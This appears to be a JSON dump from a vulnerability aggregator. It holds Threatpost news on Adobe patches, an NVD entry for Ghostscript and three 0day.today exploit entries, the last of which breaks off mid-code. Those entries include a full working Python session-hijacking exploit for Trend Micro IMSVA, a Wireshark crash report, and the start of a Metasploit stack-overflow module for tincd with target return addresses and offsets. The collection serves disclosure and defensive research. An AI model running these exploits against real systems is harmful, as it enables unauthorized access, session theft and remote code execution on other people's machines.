{"threatpost": [{"lastseen": "2019-04-25T05:45:52", "bulletinFamily": "info", "description": "Adobe released patches for two bugs rated \u201cimportant\u201d in its Adobe Digital Edition and Adobe Connect products.\n\nThe two [important](<https://helpx.adobe.com/security/products/Digital-Editions/apsb19-04.html>) vulnerabilities, patched Tuesday, include an information disclosure bug in Adobe\u2019s ebook reader software program, Digital Edition; as well as a session token exposure bug in its presentation and web conferencing software, Adobe Connect.\n\nThe \u201cimportant\u201d out of bounds read bug, [CVE-2018-12817](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-12817>), is an information disclosure vulnerability impacting Adobe Digital Edition versions 4.5.9 and earlier, for Windows, macOS, iOS and Android. Jaanus K\u00e4\u00e4p of Clarified Security was credited with discovering the issue.\n\n\u201cAdobe has released a security update for Adobe Digital Editions,\u201d according to Adobe\u2019s release. \u201cThis update resolves an important vulnerability. Successful exploitation could lead to information disclosure in the context of the current user.\u201d\n\nUsers are urged to update Adobe Digital Editions to 4.5.10 in a priority 3 update \u2013 meaning that it \u201cresolves vulnerabilities in a product that has historically not been a target for attackers\u201d according to Adobe.\n\nThe other bug, an \u201cimportant\u201d session token exposure glitch in [Adobe Connect](<https://helpx.adobe.com/security/products/connect/apsb19-05.html>), (CVE-2018-19718) could enable exposure of the privileges granted to a session. Impacted are Adobe Connect versions 9.8.1 and earlier on all platforms. Users are urged to update to Adobe Connect 10.1 in a priority 3 update.\n\nAdobe said that it is not aware of current exploits for either of these vulnerabilities.\n\nThe update comes on the heels of a slew of unscheduled fixes for Adobe Acrobat and Reader for Windows and MacOS [last week](<https://threatpost.com/adobe-critical-acrobat-reader-flaws/140547/>). The [updates](<https://blogs.adobe.com/psirt/?p=1682>) fixed two critical vulnerabilities, CVE-2018-16011 and CVE-2018-19725. Successful exploitation of the flaws could lead to [arbitrary code execution](<https://helpx.adobe.com/security/products/acrobat/apsb19-02.html>) in the context of the current user.\n\nThe patch also comes on the heels of a busy December for Adobe. The company patched 87 vulnerabilities for Acrobat and Reader in its [December Patch Tuesday](<https://threatpost.com/adobe-december-2018-patch-tuesday/139792/>) update, including a slew of critical flaws that would allow arbitrary code-execution.\n\n\u201cClosing out 2018, Adobe Flash had two Zero Day vulnerabilities in late November (CVE-2018-15981) and early December (CVE-2018-15982),\u201d Chris Goettl, director of product management for Security at Ivanti, told Threatpost. \u201cEnsure that Adobe Acrobat, Reader, and Flash Player are part of your monthly maintenance for January.\u201d\n", "modified": "2019-01-08T13:48:36", "published": "2019-01-08T13:48:36", "id": "THREATPOST:8262C6E0DB15A17DC749BCD1D3C68AED", "href": "https://threatpost.com/adobe-patches-important-bugs-in-connect-and-digital-edition/140635/", "type": "threatpost", "title": "Adobe Patches Important Bugs in Connect and Digital Edition", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-25T05:45:57", "bulletinFamily": "info", "description": "Adobe on Thursday released unscheduled security updates for Adobe Acrobat and Reader for Windows and MacOS.\n\nThe [updates](<https://blogs.adobe.com/psirt/?p=1682>) fix two critical vulnerabilities, CVE-2018-16011 and CVE-2018-19725. Successful exploitation of the flaws could lead to [arbitrary code execution](<https://helpx.adobe.com/security/products/acrobat/apsb19-02.html>) in the context of the current user.\n\nThe first vulnerability, CVE-2018-16011, reported by Sebastian Apelt in conjunction with the Zero Day Initiative, is a critical use-after-free flaw that could enable arbitrary code-execution. The vulnerability had been addressed in a separate issue included in a [previous Adobe advisory](<https://www.qualys.com/research/security-alerts/2018-12-11/adobe/>).\n\nThe second flaw, CVE-2018-19725, reported by Abdul Aziz Hariri, is a critical security bypass vulnerability that allows privilege escalation. That flaw \u201cis a security feature bypass that would allow a privilege escalation, giving an attacker broader access to the system affected,\u201d Chris Goettl, director of product management, security, at Ivanti, told Threatpost.\n\nImpacted are Acrobat DC and Acrobat Reader DC versions 2019.010.20064 and earlier; Acrobat 2017 and Acrobat Reader 2017 versions 2017.011.30110 and earlier; and Acrobat DC and Acrobat Reader DC versions 2015.006.30461 and earlier.\n\nThe patches are a priority 2, meaning that there are no known exploits for the vulnerabilities; but they exist in products that have historically been \u201cat elevated risk,\u201d according to Adobe.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/01/03163151/adobe.png>)\n\nAdobe recommends users update to Adobe Acrobat and Reader versions 2019.010.20069, Acrobat 2017 and Acrobat Reader 2017.011.30113 and Acrobat DC and Acrobat Reader DC 2015.006.30464.\n\nThe patch comes on the heels of a busy December for Adobe. The company patched 87 vulnerabilities for Acrobat and Reader in its [December Patch Tuesday](<https://threatpost.com/adobe-december-2018-patch-tuesday/139792/>) update, including a slew of critical flaws that would allow arbitrary code-execution. Beyond that, Adobe Flash had two Zero Day vulnerabilities in late November (CVE-2018-15981) and early [December](<https://threatpost.com/zero-day-microsoft-december-patch-tuesday/139826/>) (CVE-2018-15982).\n\n\u201cBetween this update and the December _[APSB18-41](<https://helpx.adobe.com/security/products/acrobat/apsb18-41.html>)_, which resolved 87 vulnerabilities, it is recommended to ensure that any Adobe Acrobat and Reader instances are updated in the next two to four weeks,\u201d Goettl told us. \u201cYou can also expect an Adobe Flash Player update next week on Patch Tuesday.\u201d\n\nBoth flaws were reported through Trend Micro\u2019s Zero Day Initiative.\n", "modified": "2019-01-04T11:30:54", "published": "2019-01-04T11:30:54", "id": "THREATPOST:17FD05502596AA5CBE03A5D56D3CA715", "href": "https://threatpost.com/adobe-critical-acrobat-reader-flaws/140547/", "type": "threatpost", "title": "Adobe Fixes Two Critical Acrobat and Reader Flaws", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2019-03-29T11:24:23", "bulletinFamily": "NVD", "description": "Artifex Ghostscript 9.25 and earlier allows attackers to bypass a sandbox protection mechanism via vectors involving errorhandler setup. NOTE: this issue exists because of an incomplete fix for CVE-2018-17183.", "modified": "2019-03-11T13:09:16", "published": "2018-10-15T12:29:02", "id": "CVE-2018-17961", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17961", "title": "CVE-2018-17961", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-02T09:36:26", "bulletinFamily": "exploit", "description": "Trend Micro IMSVA Management Portal version 9.1.0.1600 suffers from an authentication bypass vulnerability.", "modified": "2018-02-10T00:00:00", "published": "2018-02-10T00:00:00", "href": "https://0day.today/exploit/description/29759", "id": "1337DAY-ID-29759", "title": "Trend Micro IMSVA Management Portal 9.1.0.1600 Authentication Bypass Exploit", "type": "zdt", "sourceData": "Title: Trend Micro IMSVA Management Portal Authentication Bypass\r\nAdvisory ID: KL-001-2018-006\r\nPublication Date: 2018.02.08\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-006.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Trend Micro\r\n Affected Product: InterScan Mail Security Virtual Apppliance\r\n Affected Version: 9.1.0.1600\r\n Platform: Embedded Linux\r\n CWE Classification: CWE-522: Insufficiently Protected Credentials, CWE-219: Sensitive Data Under Web Root\r\n Impact: Authentication Bypass\r\n Attack vector: HTTPS\r\n\r\n2. Vulnerability Description\r\n\r\n Any unauthenticated user can bypass the authentication process.\r\n\r\n3. Technical Description\r\n\r\n The web application is plugin-based and allows widgets to\r\n be loaded into the application. A plugin which is loaded by\r\n default stores a log file of events in a directory which can be\r\n accessed by unauthenticated users. Files within this directory\r\n (such as /widget/repository/log/diagnostic.log) which contain\r\n cookie values can then be read, parsed, and session information\r\n extracted. A functional exploit is shown below.\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n Trend Micro has released a Critical Patch update to the\r\n affected versions for this vulnerability. The advisory and\r\n links to the patch(es) are available from the following URL:\r\n\r\n https://success.trendmicro.com/solution/1119277\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin (@thatguylevel)\r\n of KoreLogic, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2017.08.11 - KoreLogic submits vulnerability details to Trend Micro.\r\n 2017.08.11 - Trend Micro confirms receipt.\r\n 2017.09.15 - KoreLogic asks for an update on the triage of the\r\n reported issue.\r\n 2017.09.15 - Trend Micro informs KoreLogic that the issue is in\r\n remediation but there is no expected release date yet.\r\n 2017.09.25 - 30 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.10.06 - Trend Micro informs KoreLogic that the issue will not\r\n be addressed before the 45 business-day deadline. They\r\n ask for additional time for the details to remain\r\n embargoed in order to complete QA on the proposed fix.\r\n 2017.10.06 - KoreLogic agrees to extend the disclosure timeline.\r\n 2017.10.17 - 45 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.11.02 - Trend Micro notifies KoreLogic that the Critical Patch\r\n for IMSVA 9.1 (Critical Patch 1682) has gone live,\r\n but they are still working on the patch for IMSVA 9.0.\r\n 2017.11.07 - 60 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.12.21 - 90 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.12.28 - Trend Micro notifies KoreLogic that the IMSVA 9.0\r\n Critical Patch is being localized for foreign language\r\n customers. Expected release date is late January 2018.\r\n 2018.01.18 - Trend Micro notifies KoreLogic that the expected release\r\n date for the IMSVA 9.0 Critical Patch and the advisory\r\n is to be January 31, 2018.\r\n 2018.01.23 - 110 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2018.01.31 - Trend Micro releases the advisory associated with this\r\n vulnerability and the related Critical Patches.\r\n 2018.02.08 - KoreLogic public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n#!/usr/bin/python3\r\n\r\n\r\nfrom argparse import ArgumentParser\r\nfrom ssl import _create_unverified_context\r\nfrom time import mktime\r\nfrom urllib.request import HTTPSHandler, HTTPError, Request, urlopen, build_opener\r\n\r\n\r\nbanner = '''Trendmicro IMSVA 9.1.0.1600 Management Portal Authentication Bypass\r\n{}'''.format('-'*67)\r\n\r\n\r\nclass Exploit:\r\n def __init__(self, args):\r\n self.target_host = args.host\r\n self.target_port = args.port\r\n self.list_all = args.ls\r\n self.sessions = []\r\n self.session_latest_time = None\r\n self.session_latest_id = None\r\n self.sessions_active = []\r\n return None\r\n\r\n def is_target(self):\r\n url_loginpage = Request('https://{}:{}/loginPage.imss'.format(self.target_host, self.target_port))\r\n url_loginjsp = Request('https://{}:{}/jsp/framework/login.jsp'.format(self.target_host, self.target_port))\r\n if urlopen(url_loginpage, context=_create_unverified_context()).getcode() == 200:\r\n try:\r\n urlopen(url_loginjsp, context=_create_unverified_context())\r\n except HTTPError as e:\r\n if e.code == 403:\r\n return True\r\n else:\r\n return False\r\n return False\r\n\r\n def get_sessions(self):\r\n url_vulnpage = Request('https://{}:{}/widget/repository/log/diagnostic.log'.format(self.target_host,\r\nself.target_port))\r\n vuln_obj = urlopen(url_vulnpage, context=_create_unverified_context())\r\n if vuln_obj.getcode() == 200:\r\n vuln_pagedata = vuln_obj.read()\r\n for line in vuln_pagedata.decode('utf8').split('\\n'):\r\n if 'product_auth' in line and 'JSEEEIONID' in line:\r\n self.sessions.append((line.split(',')[0], line.split(',')[-1].split(' ')[1].split(':')[1]))\r\n else:\r\n return False\r\n return True\r\n\r\n def find_latest(self):\r\n for session in list(set(self.sessions)):\r\n year, month, day = session[0].split(' ')[0].split('-')\r\n hour, minute, second = session[0].split(' ')[1].split(':')\r\n session_time = mktime((int(year), int(month), int(day), int(hour), int(minute), int(second), 0, 0, 0))\r\n if self.session_latest_time is None:\r\n self.session_latest_time = session_time\r\n if session_time > self.session_latest_time:\r\n self.session_latest_time = session_time\r\n self.session_latest_id = session[1]\r\n if self.list_all:\r\n if self.is_session_alive():\r\n self.sessions_active.append((self.session_latest_time, self.session_latest_id))\r\n return True\r\n\r\n def is_session_alive(self):\r\n url_consolepage = Request('https://{}:{}/console.imss'.format(self.target_host, self.target_port))\r\n opener = build_opener(HTTPSHandler(context=_create_unverified_context()))\r\n opener.addheaders.append(('Cookie', 'JSESSIONID={}'.format(self.session_latest_id)))\r\n console_obj = opener.open(url_consolepage)\r\n if console_obj.getcode() == 200:\r\n console_pagedata = console_obj.read().decode('utf8')\r\n if 'parent.location.href=\"/timeout.imss\"' in console_pagedata:\r\n return False\r\n else:\r\n return False\r\n return True\r\n\r\n def run(self):\r\n if self.is_target():\r\n if self.get_sessions():\r\n print('[-] Leaked {} sessions'.format(len(self.sessions)))\r\n self.find_latest()\r\n if self.list_all and self.sessions_active:\r\n print('[+] Active sessions leaked.')\r\n sessions = []\r\n for entry in list(set(self.sessions_active)):\r\n sessions.append(entry[1])\r\n for session in list(set(sessions)):\r\n print('Set-Cookie: JSESSIONID={}'.format(session))\r\n elif self.is_session_alive():\r\n print('[+] Active session leaked.')\r\n print('Set-Cookie: JSESSIONID={}'.format(self.session_latest_id))\r\n return True\r\n else:\r\n print('[-] {} sessions leaked but none are active.'.format(len(self.sessions)))\r\n return False\r\n else:\r\n return False\r\n else:\r\n return False\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n print(banner)\r\n arg_parser = ArgumentParser(add_help=False)\r\n arg_parser.add_argument('-H', '--help', action='help', help='Help')\r\n arg_parser.add_argument('-h', '--host', default=None, required=True, help='Target host')\r\n arg_parser.add_argument('-p', '--port', default=8445, type=int, help='Target port')\r\n arg_parser.add_argument('-l', '--ls', action='store_true', default=False, help='List all sessions (noisy)')\r\n\r\n args = arg_parser.parse_args()\r\n\r\n Exploit(args).run()\r\n\r\n\r\nThe contents of this advisory are copyright(c) 2018\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt\r\n\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29759"}, {"lastseen": "2018-03-19T05:15:41", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2015-12-16T00:00:00", "published": "2015-12-16T00:00:00", "id": "1337DAY-ID-25711", "href": "https://0day.today/exploit/description/25711", "type": "zdt", "title": "Wireshark - dissect_nbap_MACdPDU_Size SIGSEGV", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=652\r\n \r\nThe following SIGSEGV crash due to an invalid memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==31034==ERROR: AddressSanitizer: SEGV on unknown address 0x7fc24e20fa84 (pc 0x7fbe445bb082 bp 0x7fff030fefb0 sp 0x7fff030fef00 T0)\r\n #0 0x7fbe445bb081 in dissect_nbap_MACdPDU_Size wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1622:79\r\n #1 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12\r\n #2 0x7fbe445c760d in dissect_nbap_HSDSCH_Initial_Capacity_AllocationItem wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1650:12\r\n #3 0x7fbe433b2fa3 in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:531:10\r\n #4 0x7fbe433be23b in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:905:9\r\n #5 0x7fbe445c7569 in dissect_nbap_HSDSCH_Initial_Capacity_Allocation wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1663:12\r\n #6 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12\r\n #7 0x7fbe445da43d in dissect_nbap_CommonMACFlow_Specific_InfoItem_Response wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1682:12\r\n #8 0x7fbe433b2fa3 in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:531:10\r\n #9 0x7fbe433be23b in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:905:9\r\n #10 0x7fbe445da399 in dissect_nbap_CommonMACFlow_Specific_InfoList_Response wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1695:12\r\n #11 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12\r\n #12 0x7fbe445da2bd in dissect_nbap_HSDSCH_Common_System_Information_ResponseFDD wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:2120:12\r\n #13 0x7fbe44546230 in dissect_HSDSCH_Common_System_Information_ResponseFDD_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:2430:12\r\n #14 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #15 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #16 0x7fbe41b35dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9\r\n #17 0x7fbe4456f40e in dissect_ProtocolExtensionFieldExtensionValue wireshark/epan/dissectors/../../asn1/nbap/packet-nbap-template.c:320:11\r\n #18 0x7fbe433addf0 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:242:5\r\n #19 0x7fbe433ae10d in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:263:9\r\n #20 0x7fbe4456f370 in dissect_nbap_T_extensionValue wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:200:12\r\n #21 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12\r\n #22 0x7fbe4456f12d in dissect_nbap_ProtocolExtensionField wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:215:12\r\n #23 0x7fbe433b2fa3 in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:531:10\r\n #24 0x7fbe433be23b in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:905:9\r\n #25 0x7fbe4456ef09 in dissect_nbap_ProtocolExtensionContainer wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:228:12\r\n #26 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12\r\n #27 0x7fbe445f23bf in dissect_nbap_CommonMeasurementInitiationRequest wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:263:12\r\n #28 0x7fbe445644d0 in dissect_CommonMeasurementInitiationRequest_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:5030:12\r\n #29 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #30 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #31 0x7fbe41b3802d in dissector_try_string wireshark/epan/packet.c:1443:9\r\n #32 0x7fbe4456e3ce in dissect_InitiatingMessageValue wireshark/epan/dissectors/../../asn1/nbap/packet-nbap-template.c:326:11\r\n #33 0x7fbe433addf0 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:242:5\r\n #34 0x7fbe433ae10d in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:263:9\r\n #35 0x7fbe4456df10 in dissect_nbap_InitiatingMessage_value wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:702:12\r\n #36 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12\r\n #37 0x7fbe4456d91d in dissect_nbap_InitiatingMessage wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:719:12\r\n #38 0x7fbe433cc861 in dissect_per_choice wireshark/epan/dissectors/packet-per.c:1714:13\r\n #39 0x7fbe4456d881 in dissect_nbap_NBAP_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:825:12\r\n #40 0x7fbe4456d740 in dissect_NBAP_PDU_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:8430:12\r\n #41 0x7fbe444e889b in dissect_nbap wireshark/epan/dissectors/../../asn1/nbap/packet-nbap-template.c:457:9\r\n #42 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #43 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #44 0x7fbe41b35dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9\r\n #45 0x7fbe4378f98b in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9\r\n #46 0x7fbe43786b88 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16\r\n #47 0x7fbe4377fd99 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14\r\n #48 0x7fbe4377cd03 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9\r\n #49 0x7fbe4377acdf in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3\r\n #50 0x7fbe43778cba in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3\r\n #51 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #52 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #53 0x7fbe41b35dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9\r\n #54 0x7fbe428455f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11\r\n #55 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #56 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9\r\n #57 0x7fbe41b402be in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #58 0x7fbe41b31ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #59 0x7fbe41b3133b in dissect_record wireshark/epan/packet.c:501:3\r\n #60 0x7fbe41adf3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2\r\n #61 0x5264eb in process_packet wireshark/tshark.c:3728:5\r\n #62 0x51f960 in load_cap_file wireshark/tshark.c:3484:11\r\n #63 0x515daf in main wireshark/tshark.c:2197:13\r\n \r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1622:79 in dissect_nbap_MACdPDU_Size\r\n==31034==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11815. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38999.zip\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/25711"}, {"lastseen": "2018-01-05T13:20:31", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a stack buffer overflow in Tinc's tincd service. After authentication, a specially crafted tcp packet (default port 655) leads to a buffer overflow and allows to execute arbitrary code. This Metasploit module has been tested with tinc-1.1pre6 on Windows XP (custom calc payload) and Windows 7 (windows/meterpreter/reverse_tcp), and tinc version 1.0.19 from the ports of FreeBSD 9.1-RELEASE # 0 and various other OS, see targets. The exploit probably works for all versions <= 1.1pre6. A manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to be a non-exploitable crash due to calls to __memcpy_chk depending on how tincd was compiled. Bug got fixed in version 1.0.21/1.1pre7. While writing this module it was recommended to the maintainer to start using DEP/ASLR and other protection mechanisms.", "modified": "2014-12-02T00:00:00", "published": "2014-12-02T00:00:00", "id": "1337DAY-ID-22960", "href": "https://0day.today/exploit/description/22960", "type": "zdt", "title": "Tincd Post-Authentication Remote TCP Stack Buffer Overflow Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'securerandom'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = AverageRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::Remote::TincdExploitClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Tincd Post-Authentication Remote TCP Stack Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack buffer overflow in Tinc's tincd\r\n service. After authentication, a specially crafted tcp packet (default port 655)\r\n leads to a buffer overflow and allows to execute arbitrary code. This module has\r\n been tested with tinc-1.1pre6 on Windows XP (custom calc payload) and Windows 7\r\n (windows/meterpreter/reverse_tcp), and tinc version 1.0.19 from the ports of\r\n FreeBSD 9.1-RELEASE # 0 and various other OS, see targets. The exploit probably works\r\n for all versions <= 1.1pre6.\r\n A manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to\r\n be a non-exploitable crash due to calls to __memcpy_chk depending on how tincd\r\n was compiled. Bug got fixed in version 1.0.21/1.1pre7. While writing this module\r\n it was recommended to the maintainer to start using DEP/ASLR and other protection\r\n mechanisms.\r\n },\r\n 'Author' =>\r\n [\r\n # PoC changes (mostly reliability), port python to ruby, exploitation including ROP, support for all OS, metasploit module\r\n 'Tobias Ospelt <tobias[at]modzero.ch>', # @floyd_ch\r\n # original finding, python PoC crash\r\n 'Martin Schobert <schobert[at]modzero.ch>' # @nitram2342\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2013-1428'],\r\n ['OSVDB', '92653'],\r\n ['BID', '59369'],\r\n ['URL', 'http://www.floyd.ch/?p=741'],\r\n ['URL', 'http://sitsec.net/blog/2013/04/22/stack-based-buffer-overflow-in-the-vpn-software-tinc-for-authenticated-peers/'],\r\n ['URL', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1428']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process'\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 1675,\r\n 'DisableNops' => true\r\n },\r\n 'Privileged' => true,\r\n 'Targets' =>\r\n [\r\n # full exploitation x86:\r\n ['Windows XP x86, tinc 1.1.pre6 (exe installer)', { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],\r\n ['Windows 7 x86, tinc 1.1.pre6 (exe installer)', { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],\r\n ['FreeBSD 9.1-RELEASE # 0 x86, tinc 1.0.19 (ports)', { 'Platform' => 'bsd', 'Ret' => 0x0804BABB, 'offset' => 1676 }],\r\n ['Fedora 19 x86 ROP (NX), write binary to disk payloads, tinc 1.0.20 (manual compile)', {\r\n 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Ret' => 0x4d10ee87, 'offset' => 1676 }\r\n ],\r\n ['Fedora 19 x86 ROP (NX), CMD exec payload, tinc 1.0.20 (manual compile)', {\r\n 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Ret' => 0x4d10ee87, 'offset' => 1676 }\r\n ],\r\n ['Archlinux 2013.04.01 x86, tinc 1.0.20 (manual compile)', { 'Platform' => 'linux', 'Ret' => 0x08065929, 'offset' => 1676 }],\r\n ['OpenSuse 11.2 x86, tinc 1.0.20 (manual compile)', { 'Platform' => 'linux', 'Ret' => 0x0804b07f, 'offset' => 1676 }],\r\n # full exploitation ARM:\r\n ['Pidora 18 ARM ROP(NX)/ASLR brute force, write binary to disk payloads, tinc 1.0.20 (manual compile with restarting daemon)', {\r\n 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'Ret' => 0x00015cb4, 'offset' => 1668 }\r\n ],\r\n ['Pidora 18 ARM ROP(NX)/ASLR brute force, CMD exec payload, tinc 1.0.20 (manual compile with restarting daemon)', {\r\n 'Platform' => 'linux', 'Arch' => ARCH_CMD, 'Ret' => 0x00015cb4, 'offset' => 1668 }\r\n ],\r\n # crash only:\r\n ['Crash only: Ubuntu 12.10 x86, tinc 1.1.pre6 (apt-get or manual compile)', { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],\r\n ['Crash only: Fedora 16 x86, tinc 1.0.19 (yum)', { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],\r\n ['Crash only: OpenSuse 11.2 x86, tinc 1.0.16 (rpm package)', { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],\r\n ['Crash only: Debian 7.3 ARM, tinc 1.0.19 (apt-get)', { 'Platform' => 'linux', 'Ret' => 0x9000, 'offset' => 1668 }]\r\n ],\r\n 'DisclosureDate' => 'Apr 22 2013', # finding, msf module: Dec 2013\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [ # Only for shellcodes that write binary to disk\r\n # Has to be short, usually either . or /tmp works\r\n # /tmp could be mounted as noexec\r\n # . is usually only working if tincd is running as root\r\n OptString.new('BINARY_DROP_LOCATION', [false, 'Short location to drop executable on server, usually /tmp or .', '/tmp']),\r\n OptInt.new('BRUTEFORCE_TRIES', [false, 'How many brute force tries (ASLR brute force)', 200]),\r\n OptInt.new('WAIT', [false, 'Waiting time for server daemon restart (ASLR 